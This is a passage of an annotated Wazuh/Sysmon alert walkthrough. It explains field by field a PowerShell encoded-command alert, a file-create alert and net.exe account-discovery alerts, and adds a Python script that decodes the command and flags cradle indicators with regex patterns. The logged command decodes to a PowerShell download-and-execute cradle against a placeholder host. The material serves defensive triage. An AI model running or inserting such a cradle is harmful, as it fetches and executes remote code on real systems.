data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.991423 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, which is how you keep Sysmon process creates apart from the Security log's 4688.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID. It is the same on every host, so it is a filter key, not an identifier of this machine.
data.win.system.eventID: 1 Sysmon event ID, in Sysmon's own numbering: 1 = Process Create, 11 = FileCreate. Do not confuse with Security-log IDs such as 4624 or 4688.
data.win.system.version: 5 Event template version; it increments when Sysmon adds fields to this event type. Not the Sysmon binary version.
data.win.system.level: 4 Windows event level, 4 = Informational. Sysmon logs everything at this level, so severity comes from the Wazuh rule level, not from here.
data.win.system.task: 1 Task category; for Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:52.6827009Z Time the event was written to the log (ETW timestamp, 100 ns resolution, UTC). Sysmon's own timestamp of the process start is eventdata.utcTime (22:35:50.858), almost 2 s earlier; use that one for ordering.
data.win.system.eventRecordID: 282279 Position in the Sysmon/Operational channel. Gaps between the record IDs of consecutive alerts show events that were logged but raised no alert.
data.win.system.processID: 3712 PID of the process that wrote the event, i.e. the Sysmon service, not the process being reported (that is eventdata.processId, 9592). It is 3712 in every alert on this page.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational The event log the record lives in; open this channel in Event Viewer or wevtutil to read the neighbours.
data.win.system.computer: Attacker NetBIOS name of the logging host as Windows reports it; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:50.858
ProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00}
ProcessId: 9592
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00}
ParentProcessId: 1148
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" The rendered text of the Sysmon event. The same values appear parsed as data.win.eventdata.* below; read this copy for a human view and exact quoting, query the parsed fields for anything else.
data.win.eventdata.utcTime: 2025-04-24 22:35:50.858 Sysmon's timestamp of the process creation (UTC, millisecond precision). This is the timeline time for the event.
data.win.eventdata.processGuid: {94294ddc-bcc6-680a-b30a-000000000e00} Sysmon's GUID for this process instance. PIDs get reused, GUIDs do not, so build the process tree by joining a child's parentProcessGuid to its parent's processGuid. The EID 11 alert that follows carries this same GUID.
data.win.eventdata.processId: 9592 Windows PID of the new process. Fine for matching events seconds apart; use the GUID for anything longer.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable. The doubled backslashes are JSON escaping in the parsed copy; the message above shows the real path.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) File version from the PE version resource; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource. Free text set by whoever built the binary; trust it only together with the hash or a signature check.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource; same caveat as product.
data.win.eventdata.originalFileName: PowerShell.EXE File name compiled into the binary. When it differs from the image's file name the binary was renamed; here they agree.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA The full command line. The powershell.exe path appears twice (the second copy is the first argument, exactly as in parentCommandLine). -EncodedCommand is base64 over UTF-16LE, not UTF-8, and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): a download-and-execute cradle. Decode every encoded command before triage; decoding it as UTF-8 yields NUL-riddled junk.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process: the user's profile root.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as: local account Attcker1 on host Attacker. The event itself spells it this way, and currentDirectory agrees.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Identifies the logon session; matches the Logon GUID of the Security log's 4624 event for that session.
data.win.eventdata.logonId: 0x26584 Logon session ID, hex. Search the Security log for Logon ID 0x26584 to see when and how (console, RDP, network) this session began.
data.win.eventdata.terminalSessionId: 1 Interactive session 1 (session 0 is reserved for services), so a user was logged on at the console or over RDP.
data.win.eventdata.integrityLevel: Medium Standard, non-elevated user token. The cradle did not run as admin; watch for a later High or System process in the same chain.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC SHA256 of the image file on disk. Compare it with the hash other events report for the same path; a change means the binary changed.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} GUID of the creating process. Look up the EID 1 whose processGuid is this value to see what launched PID 1148; that is where the chain starts.
data.win.eventdata.parentProcessId: 1148 PID of the parent at the time of creation.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Also powershell.exe: PowerShell spawned PowerShell.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Identical to the child's command line, encoded payload included. The same cradle was already running in the parent, so the chain starts at least one level above this event.
data.win.eventdata.parentUser: Attacker\\Attcker1 Same account as the child; no impersonation or elevation between parent and child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
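Decoding the -EncodedCommand argument is the first check to make on the alert above. The script below is an added example written for this page, not code from Wazuh, Sysmon or the page's author. It takes the commandLine string copied from the alert, extracts the encoded argument using PowerShell's prefix-matching rule for switch names (-e, -ec, -enc and so on all mean -EncodedCommand), decodes it as UTF-16LE, and flags download-cradle indicators in both the outer command line and the decoded payload. The indicator names and function names are this example's own choices.

```python
"""Decode a PowerShell -EncodedCommand argument from a Sysmon EID 1 command line
and flag download-cradle indicators.

Added example for triaging the alert above; not code from Wazuh, Sysmon or the
page's author. It runs offline on the command-line string copied from the alert.
"""
import base64
import binascii
import re

# Copied from data.win.eventdata.commandLine above, JSON escaping removed.
SAMPLE_COMMANDLINE = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    '-NoLogo -NoProfile -EncodedCommand '
    'SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A'
    'RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA'
    'ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA'
)

_TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # quoted strings or bare words

# Indicator labels are this example's own; the regexes cover the usual spellings.
CRADLE_PATTERNS = {
    'invoke-expression': re.compile(r'\biex\b|invoke-expression', re.I),
    'web-download': re.compile(
        r'downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|invoke-restmethod',
        re.I),
    'hidden-or-bypass': re.compile(r'-w(?:in\w*)?\s+hidden|-e(?:x\w*|p)\s+bypass', re.I),
}
URL_RE = re.compile(r"""https?://[^\s'")<>]+""", re.I)


def extract_encoded_command(cmdline: str):
    """Return the base64 argument of -EncodedCommand, or None if absent.

    powershell.exe accepts any unambiguous prefix of a switch name (-e, -ec,
    -enc, ...), and '/' as well as '-' as the switch character, so match by
    prefix of 'encodedcommand' rather than one fixed spelling. -ep (ExecutionPolicy)
    is rejected because 'encodedcommand' does not start with 'ep'.
    """
    tokens = _TOKEN_RE.findall(cmdline)
    for i, tok in enumerate(tokens[:-1]):
        name = tok[1:].lower()
        if tok[:1] in '-/' and name.startswith('e') and 'encodedcommand'.startswith(name):
            return tokens[i + 1].strip('"')
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8. Missing padding is
    restored; invalid base64 or an odd byte count raises to the caller."""
    raw = base64.b64decode(b64 + '=' * (-len(b64) % 4), validate=True)
    return raw.decode('utf-16-le')


def analyze_commandline(cmdline: str) -> dict:
    """Decode any encoded payload and report cradle indicators and URLs found in
    the outer command line plus the decoded text."""
    result = {'encoded': False, 'decoded': None, 'indicators': [], 'urls': [], 'error': None}
    text = cmdline
    b64 = extract_encoded_command(cmdline)
    if b64 is not None:
        result['encoded'] = True
        try:
            result['decoded'] = decode_encoded_command(b64)
        except (binascii.Error, UnicodeDecodeError) as exc:
            result['error'] = f'undecodable payload: {exc}'
        else:
            text = cmdline + '\n' + result['decoded']
    result['indicators'] = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(text)]
    result['urls'] = URL_RE.findall(text)
    return result


if __name__ == '__main__':
    for key, value in analyze_commandline(SAMPLE_COMMANDLINE).items():
        print(f'{key}: {value}')
```

On the alert's command line this reports the decoded cradle, the indicators invoke-expression and web-download, and the URL https://example.com/test. A payload that is valid base64 but not valid UTF-16LE (an odd byte count, for instance) is reported in the error field instead of raising, so a truncated command line still yields the indicators visible in the outer command.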
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert's headline, but check it against the data: here the created file is a .ps1 in the user's Temp folder, not an executable, so read targetFilename before acting.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.999485 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event: Sysmon.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID, identical on every host.
data.win.system.eventID: 11 Sysmon event ID 11 = FileCreate (a file was created or overwritten). Sysmon's own numbering, unrelated to Security-log IDs.
data.win.system.version: 2 Event template version for EID 11.
data.win.system.level: 4 Informational; Sysmon logs all its events at this level.
data.win.system.task: 11 Mirrors the Sysmon event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:52.8943928Z Log write time; the operation itself is stamped in eventdata.utcTime (22:35:52.870), 2 s after this PowerShell instance started.
data.win.system.eventRecordID: 282280 Immediately follows 282279: the process create and this file create are consecutive records in the Sysmon log.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the process that created the file.
data.win.system.threadID: 4740 Thread of the Sysmon service; same caveat.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational The event log the record lives in.
data.win.system.computer: Attacker NetBIOS name of the logging host; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:52.870
ProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00}
ProcessId: 9592
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mqh0ir2i.w0v.ps1
CreationUtcTime: 2025-04-24 22:35:52.870
User: Attacker\Attcker1" Rendered text of the Sysmon event; the parsed copy of each field is in data.win.eventdata.* below.
data.win.eventdata.utcTime: 2025-04-24 22:35:52.870 Sysmon's timestamp of the file creation (UTC).
data.win.eventdata.processGuid: {94294ddc-bcc6-680a-b30a-000000000e00} Same GUID as the encoded-command alert above: this file was written by that PowerShell instance.
data.win.eventdata.processId: 9592 Same PID as the encoded-command alert.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Process that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mqh0ir2i.w0v.ps1 The created file. __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder is the probe PowerShell writes on every start-up to test whether AppLocker/WDAC script enforcement applies, then deletes. It is a known benign artifact and the usual reason this rule fires for PowerShell; the signal in this alert is not the file but the processGuid, which ties it to the cradle process. Tune the rule on this name pattern rather than raising the noise.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:52.870 The file's creation timestamp. When it is earlier than utcTime the file existed before and was overwritten (or its timestamp was set); here both match, a fresh file.
data.win.eventdata.user: Attacker\\Attcker1 Account that created the file; same as the cradle process.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert's headline. For this event it is true but incomplete: net.exe did run an account query, but the parent fields show the Wazuh agent, not a user, started it.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.1002249 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event: Sysmon.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID, identical on every host.
data.win.system.eventID: 1 Sysmon event ID 1 = Process Create. Sysmon's own numbering, unrelated to Security-log 4688.
data.win.system.version: 5 Event template version for EID 1.
data.win.system.level: 4 Informational; Sysmon logs all its events at this level.
data.win.system.task: 1 Mirrors the Sysmon event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:53.9716064Z Log write time; Sysmon's timestamp of the process start is eventdata.utcTime (22:35:53.953).
data.win.system.eventRecordID: 282297 Sixteen records after the previous alert's 282280. Those 16 Sysmon events raised no alert shown here; fetch them by record ID from the channel to see what happened in between.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of net.exe or its parent.
data.win.system.threadID: 4740 Thread of the Sysmon service; same caveat.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational The event log the record lives in.
data.win.system.computer: Attacker NetBIOS name of the logging host; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:53.953
ProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00}
ProcessId: 11604
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" Rendered text of the Sysmon event; the parsed copy of each field is in data.win.eventdata.* below.
data.win.eventdata.utcTime: 2025-04-24 22:35:53.953 Sysmon's timestamp of the process start (UTC); 1.1 s after the PowerShell instance's file-create event.
data.win.eventdata.processGuid: {94294ddc-bcc9-680a-b80a-000000000e00} GUID of this net.exe instance. The net1.exe alert that follows names this value as its parentProcessGuid.
data.win.eventdata.processId: 11604 Windows PID of this net.exe; reused later, so prefer the GUID for joins.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe The 32-bit net.exe from SysWOW64. A 32-bit parent is subject to WOW64 file-system redirection, so this follows from the parent being the 32-bit Wazuh agent under Program Files (x86); a 64-bit attacker shell would normally launch System32\net.exe.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) File version from the PE version resource.
data.win.eventdata.description: Net Command Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource; free text, trust it only with the hash.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource; same caveat.
data.win.eventdata.originalFileName: net.exe Compiled-in file name; matches the image name, so the binary was not renamed.
data.win.eventdata.commandLine: net user guest Queries the Guest account's details (active or not, group membership). Discovery when an intruder types it, routine when a management tool runs it; the parent fields say which this is.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ The Wazuh agent's own install directory. A child inherits its parent's working directory, so this alone points at the agent as the launcher.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Runs as LocalSystem.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Logon session GUID; identical in the other two net.exe alerts.
data.win.eventdata.logonId: 0x3e7 0x3E7 (999) is the well-known SYSTEM logon session that exists from boot; no 4624 logon to chase.
data.win.eventdata.terminalSessionId: 0 Session 0, where services run; no interactive user is involved.
data.win.eventdata.integrityLevel: System System integrity: the process has full local rights.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 SHA256 of SysWOW64\net.exe on disk; the later net user administrator alert shows the same hash, as it should.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} GUID of the creating process. The later net user administrator alert has the same parent GUID: one long-running parent issuing several account queries.
data.win.eventdata.parentProcessId: 3244 PID of the parent.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe The Wazuh agent itself spawned net.exe. The agent runs commands for its own configuration checks, so confirm this against the agent's configuration (SCA policy, command wodle), then tune the rule by parent image rather than ignoring it; the same command with a shell, Office or PowerShell parent is real discovery.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" The agent service's own command line, no arguments.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM The agent service runs as LocalSystem, which is why the child does too.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert's headline. This is the second alert for the same `net user guest` command: net.exe hands the work to net1.exe, and the rule fires on both.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.1007500 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event: Sysmon.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID, identical on every host.
data.win.system.eventID: 1 Sysmon event ID 1 = Process Create.
data.win.system.version: 5 Event template version for EID 1.
data.win.system.level: 4 Informational; Sysmon logs all its events at this level.
data.win.system.task: 1 Mirrors the Sysmon event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.1048194Z Log write time; the process start is stamped in eventdata.utcTime (22:35:54.098), 0.15 s after the net.exe that launched it.
data.win.system.eventRecordID: 282300 Three records after the net.exe alert's 282297; the two in between raised no alert shown here.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of net1.exe.
data.win.system.threadID: 4740 Thread of the Sysmon service; same caveat.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational The event log the record lives in.
data.win.system.computer: Attacker NetBIOS name of the logging host; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.098
ProcessGuid: {94294ddc-bcca-680a-ba0a-000000000e00}
ProcessId: 4036
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00}
ParentProcessId: 11604
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user guest
ParentUser: NT AUTHORITY\SYSTEM" Rendered text of the Sysmon event; the parsed copy of each field is in data.win.eventdata.* below.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.098 Sysmon's timestamp of the process start (UTC).
data.win.eventdata.processGuid: {94294ddc-bcca-680a-ba0a-000000000e00} GUID of this net1.exe instance.
data.win.eventdata.processId: 4036 Windows PID of net1.exe.
